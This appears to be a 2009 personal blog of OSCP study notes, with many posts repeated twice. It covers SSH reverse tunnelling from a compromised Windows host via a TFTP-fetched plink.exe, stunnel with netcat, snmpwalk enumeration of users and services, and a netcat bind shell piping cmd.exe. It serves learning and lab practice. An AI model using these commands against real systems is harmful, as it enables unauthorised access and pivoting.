Let's start by getting a simple ssh client to our windows machines. There are many ways one can do this, I prefer using TFTP for 2 reasons. Firstly Windows usually comes with a TFTP client and Backtrack has a nifty TFTP server readily available. (note: one must always verify and see upload/download options)
So let's start by uploading our ssh client "plink.exe"
C:\>TFTP -i -your IP here- GET plink.exe
There's no progress bar, so you'll just have to wait for your prompt to come back once the upload is finished.
Now that you have your client, lets start our ssh connection. Make sure you have your listener setup.
C:\>plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-
Real quick, the -C puts compression on the connection and the -R remotely fowards it to the local machine. The user and password should be set to your own on the ssh server.
If all went well you'll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now.
Start up rdesktop and point it to 127.0.0.1 on port 3389 and you'll be rewarded with a nice remote desktop.One could use this method on other ports for other means.
As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine.
Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world.
Here's a nice wiki explaining the subject in more depth -here-
So let's imagine you've managed to receive a reserve shell from your target Windows machine. Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack (How you got your reserve shell is not important).
Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting but that would be better explained with Metasploit). The exercise here is, how to gain access to this non routed port to your machine that is outside the network. The answer is a tunnel, and in our case an SSH tunnel.
First you'll need an SSH server on your system (the attacker), an SSH client on your target. This example assumes that outgoing traffic isn't limited or monitored. Remember this is just a simple exercise that can be easily accomplished at home on your local network.
Let's start by getting a simple ssh client to our windows machines. There are many ways one can do this, I prefer using TFTP for 2 reasons. Firstly Windows usually comes with a TFTP client and Backtrack has a nifty TFTP server readily available. (note: one must always verify and see upload/download options)
So let's start by uploading our ssh client "plink.exe"
C:\>TFTP -i -your IP here- GET plink.exe
There's no progress bar, so you'll just have to wait for your prompt to come back once the upload is finished.
Now that you have your client, lets start our ssh connection. Make sure you have your listener setup.
C:\>plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-
Real quick, the -C puts compression on the connection and the -R remotely fowards it to the local machine. The user and password should be set to your own on the ssh server.
If all went well you'll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now.
Start up rdesktop and point it to 127.0.0.1 on port 3389 and you'll be rewarded with a nice remote desktop.One could use this method on other ports for other means.
As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine.
Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world.
Tuesday, June 23, 2009
SSL & using stunnel
When connecting to port 995 (e-mail SSL accepted server) using a raw TCP connection, nothing will happen since it's expecting SSL "commands". So we could type anything we want after the connection is made, and nothing will happen. What we need to do is, encapsulate our "traffic" in SSL. This can be done using stunnel. Visit the author's site, and have a look around.
If it's not installed on your Linux distribution then I recommend doing so. There's also a Windows version as well which I also suggest getting if you want to test out creating a netcat session between 2 machines using an stunnel.
Let's see how we can go about creating a simple chat session between 2 machines with netcat and stunnel. First let's setup our listening machine to accept SSL connections on a specified port. Lets start by configuring our client machine to accept traffic on a given port, take that traffic and encapsulate it SSL and sent to socket accepting SSL connections.
First open up stunnel's config file (I'm my Linux machine as client) and add/modify the following:
.../stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = -Listening IP-:4444
...
Any traffic entering port 5555 will be encapsulated and sent to port 5555 on the target IP as SSL traffic.
Now let's setup the stunnel service on our listening machine, in this case the Windows system.
../stunnel.cong
client = no
[netcat server]
accept = 4444
connect = 7777
...
So now that we have stunnel setup on both machines, let's start the connection using netcat.
From our listening system, or serve:
C:\>nc -vlp 7777
And now, let's connect from our Linux system:
Linux~# nc -nv 127.0.0.1 5555
If everything went according to plan, the Linux box connects to local port 5555 which is then encapsulated and sent to the listening's IP address which is expecting an SSL conneciton. One should be able now to "chat" between the two systems.
One can also receive a reverse shell this way, or connect to a pop3 mail server which only accepts SSL connections on the default port 995.
If it's not installed on your Linux distribution then I recommend doing so. There's also a Windows version as well which I also suggest getting if you want to test out creating a netcat session between 2 machines using an stunnel.
Let's see how we can go about creating a simple chat session between 2 machines with netcat and stunnel. First let's setup our listening machine to accept SSL connections on a specified port. Lets start by configuring our client machine to accept traffic on a given port, take that traffic and encapsulate it SSL and sent to socket accepting SSL connections.
First open up stunnel's config file (I'm my Linux machine as client) and add/modify the following:
.../stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = -Listening IP-:4444
...
Any traffic entering port 5555 will be encapsulated and sent to port 5555 on the target IP as SSL traffic.
Now let's setup the stunnel service on our listening machine, in this case the Windows system.
../stunnel.cong
client = no
[netcat server]
accept = 4444
connect = 7777
...
So now that we have stunnel setup on both machines, let's start the connection using netcat.
From our listening system, or serve:
C:\>nc -vlp 7777
And now, let's connect from our Linux system:
Linux~# nc -nv 127.0.0.1 5555
If everything went according to plan, the Linux box connects to local port 5555 which is then encapsulated and sent to the listening's IP address which is expecting an SSL conneciton. One should be able now to "chat" between the two systems.
One can also receive a reverse shell this way, or connect to a pop3 mail server which only accepts SSL connections on the default port 995.
Sunday, June 21, 2009
SNMP Protocol & snmpwalk
The SNMP is a management protocol often used to monitor and remotly configures servers and other network devices such as switches, router etc.
This protocol has a weak authentication system: public and private community strings.
Scanning machines with snmp enabled can give interesting results if improperly configured. Many tools exist, but the one I was exposed to during my Offensive Security course was snmpwalk.
Scanning a Windows system running snmp.
From our linux machine's shell, we'd would type the following command to scan a single machine.
linux~#snmpwalk -c public -v1 -target IP-
This can return information such as running services, and/or installed applications. Also somewhere in the output, we could find the operating system's version. It can be a very long output, so using grep is a good idea.
linux~#snmpwalk -c public -v1 -target IP- | grep sysDescr.0
One can also enumerate users with snmpwalk:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep 77.1.2.25 | cut -d" " -f4
Enumerating services with snmpwalk:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep hrSWRunName | cut -d" " -f4
Enumerating TCP ports:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep tcpConnState | cut -d" " -f4
And enumerating installed applications:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep hrSWInstalledName | cut -d" " -f4
The above syntax, the switches -c & -v are used. The first -c is to indicate which community string: public or private. The second, -v tells the script which version of snmp to use. In this case version 1. We also inform the script to add the root of the mib tree with "1" after the target's IP address. See top of the this post for a wiki link on the mib tree.
Of course, one can use the following script "snmpcheck" to gather most or all information availible in a more human readable format.
This protocol has a weak authentication system: public and private community strings.
- Public community string can read information from a SNMP enabled device
- Private community string can often reconfigure a device
Scanning machines with snmp enabled can give interesting results if improperly configured. Many tools exist, but the one I was exposed to during my Offensive Security course was snmpwalk.
Scanning a Windows system running snmp.
From our linux machine's shell, we'd would type the following command to scan a single machine.
linux~#snmpwalk -c public -v1 -target IP
This can return information such as running services, and/or installed applications. Also somewhere in the output, we could find the operating system's version. It can be a very long output, so using grep is a good idea.
linux~#snmpwalk -c public -v1 -target IP
One can also enumerate users with snmpwalk:
linux~#snmpwalk -c public -v1 -target IP
Enumerating services with snmpwalk:
linux~#snmpwalk -c public -v1 -target IP
Enumerating TCP ports:
linux~#snmpwalk -c public -v1 -target IP
And enumerating installed applications:
linux~#snmpwalk -c public -v1 -target IP
The above syntax, the switches -c & -v are used. The first -c is to indicate which community string: public or private. The second, -v tells the script which version of snmp to use. In this case version 1. We also inform the script to add the root of the mib tree with "1" after the target's IP address. See top of the this post for a wiki link on the mib tree.
Of course, one can use the following script "snmpcheck" to gather most or all information availible in a more human readable format.
Saturday, June 20, 2009
Simple Netcat usage
Netcat is a powerful tool that everyone should learn to use. I've only been aware of this tool for about a month now, and already I'm finding way to use it (or situations where it could be useful) at work.
Netcat is able to connect (read/write)to any port using TCP or UDP protocols. One can send and receive files, scan ports and you can even redirect standard input/output/errors with netcat. It's also possible to use netcat for port redirection.
Here are few interesting articles about Netcat:
GIAC
Wikipedia
Here are few simple examples of the netcat syntax. Let's look at transferring a text file from a Windows machine to a Linux machine. Of course, we'll assume the Windows system has a copy of netcat.
First the Linux machine, receiving the file, needs to setup a listener.
linux~#nc -lvp 4444 > output.txt
Any traffic directed to port 4444 will be directed into the output.txt file.
Second, the Windows system will open a connection and send the text file.
C:\>nc -nv -Linux IP here- 4444 <>
The contents of test.txt will be piped into port 4444, and sent to our listening Linux machine.
Now netcat doesn't have any "progress bar" to show when the transfer is completed, so you need to guess and kill the connection manually using the CTRL-C key combination.
Banner grabbing with netcat is pretty simple. All one needs to do is connect to the specified IP address and port. Once connected, depending on the port one used, commands can be issued to gather more information. Of course, all services will give out banners, and systems administrators can always remove the banner. Let's look at how one can retrieve an SMTP banner.
linux~#nc -nv -IP address- 25
Sometimes, but not always, the SMTP server will give out information such as:
Sendmail 8.13.1/8.13.1
One can also type in commands once connected to verify the existence of users.
Another fun thing one can do with netcat, is command redirection. Using the "-e" switch, you can redirect standard input, output and error to a specific port. So we can essentially send a command shell via netcat so let's do this.
Imagine 2 users on a the same network, John and Cindy. John needs Cindy's assistance on his computer and wishes to send her a command shell over the network to her computer.
So let's start by starting netcat on a particular port, and bind redirect our command shell to it.
From John's computer:
C:\>nc -lvn 4444 -e cmd.exe
This will basically redirect all input/output & errors from cmd.exe to port 4444.
From Cindy's computer:
Now that John's netcat is waiting for a connection, all that Cindy needs to do is connect to John's computer on port 4444 and she should receive the command prompt.
linux~#nc -nv -John's ip here- 4444
This is called a bind shell. Try it and see...
Netcat is able to connect (read/write)to any port using TCP or UDP protocols. One can send and receive files, scan ports and you can even redirect standard input/output/errors with netcat. It's also possible to use netcat for port redirection.
Here are few interesting articles about Netcat:
GIAC
Wikipedia
Here are few simple examples of the netcat syntax. Let's look at transferring a text file from a Windows machine to a Linux machine. Of course, we'll assume the Windows system has a copy of netcat.
First the Linux machine, receiving the file, needs to setup a listener.
linux~#nc -lvp 4444 > output.txt
Any traffic directed to port 4444 will be directed into the output.txt file.
Second, the Windows system will open a connection and send the text file.
C:\>nc -nv -Linux IP here- 4444 <>
The contents of test.txt will be piped into port 4444, and sent to our listening Linux machine.
Now netcat doesn't have any "progress bar" to show when the transfer is completed, so you need to guess and kill the connection manually using the CTRL-C key combination.
Banner grabbing with netcat is pretty simple. All one needs to do is connect to the specified IP address and port. Once connected, depending on the port one used, commands can be issued to gather more information. Of course, all services will give out banners, and systems administrators can always remove the banner. Let's look at how one can retrieve an SMTP banner.
linux~#nc -nv -IP address- 25
Sometimes, but not always, the SMTP server will give out information such as:
Sendmail 8.13.1/8.13.1
One can also type in commands once connected to verify the existence of users.
Another fun thing one can do with netcat, is command redirection. Using the "-e" switch, you can redirect standard input, output and error to a specific port. So we can essentially send a command shell via netcat so let's do this.
Imagine 2 users on a the same network, John and Cindy. John needs Cindy's assistance on his computer and wishes to send her a command shell over the network to her computer.
So let's start by starting netcat on a particular port, and bind redirect our command shell to it.
From John's computer:
C:\>nc -lvn 4444 -e cmd.exe
This will basically redirect all input/output & errors from cmd.exe to port 4444.
From Cindy's computer:
Now that John's netcat is waiting for a connection, all that Cindy needs to do is connect to John's computer on port 4444 and she should receive the command prompt.
linux~#nc -nv -John's ip here- 4444
This is called a bind shell. Try it and see...
Obligatory first post...
Well, after years of reading on other people's blogs. After weeks of debating if I should start one of my own, and wondering what would I write about. I finally figured out a subject... Computers, network security and other related subjects.
Now, I'm no expert. Not a profession security consultant, nor am I a security analyst. I'm a system administrator, presently learning the ins and outs of security.
Figured I'd use a blog as a reference. I'll post links to articles related to computer networking and network security, and maybe type up some of my own learning experience during my journey into this strange/difficult and mythical subject known a "Penetration Testing".
A little about myself I suppose. Been in IT for a few years now, and like many I've had a computer since I was a kid (back in the 8086 days). Got a few certifications such as MCDST, Comptia Linux+, Network+, i-Net+ and for some reason I have a CIW certification...don't ask.
Presently working on Offensive Security 101 [now known as Pentesting with Backtrack], so I'm looking forward to eventually getting the Offensive Security Certified Professional, or OSCP. So odds are, I'll mostly be posting my experiences along the course, without going against the course's copyright. Let me tell you, this one is hard...
Now, I'm no expert. Not a profession security consultant, nor am I a security analyst. I'm a system administrator, presently learning the ins and outs of security.
Figured I'd use a blog as a reference. I'll post links to articles related to computer networking and network security, and maybe type up some of my own learning experience during my journey into this strange/difficult and mythical subject known a "Penetration Testing".
A little about myself I suppose. Been in IT for a few years now, and like many I've had a computer since I was a kid (back in the 8086 days). Got a few certifications such as MCDST, Comptia Linux+, Network+, i-Net+ and for some reason I have a CIW certification...don't ask.
Presently working on Offensive Security 101 [now known as Pentesting with Backtrack], so I'm looking forward to eventually getting the Offensive Security Certified Professional, or OSCP. So odds are, I'll mostly be posting my experiences along the course, without going against the course's copyright. Let me tell you, this one is hard...
Subscribe to:
Posts (Atom)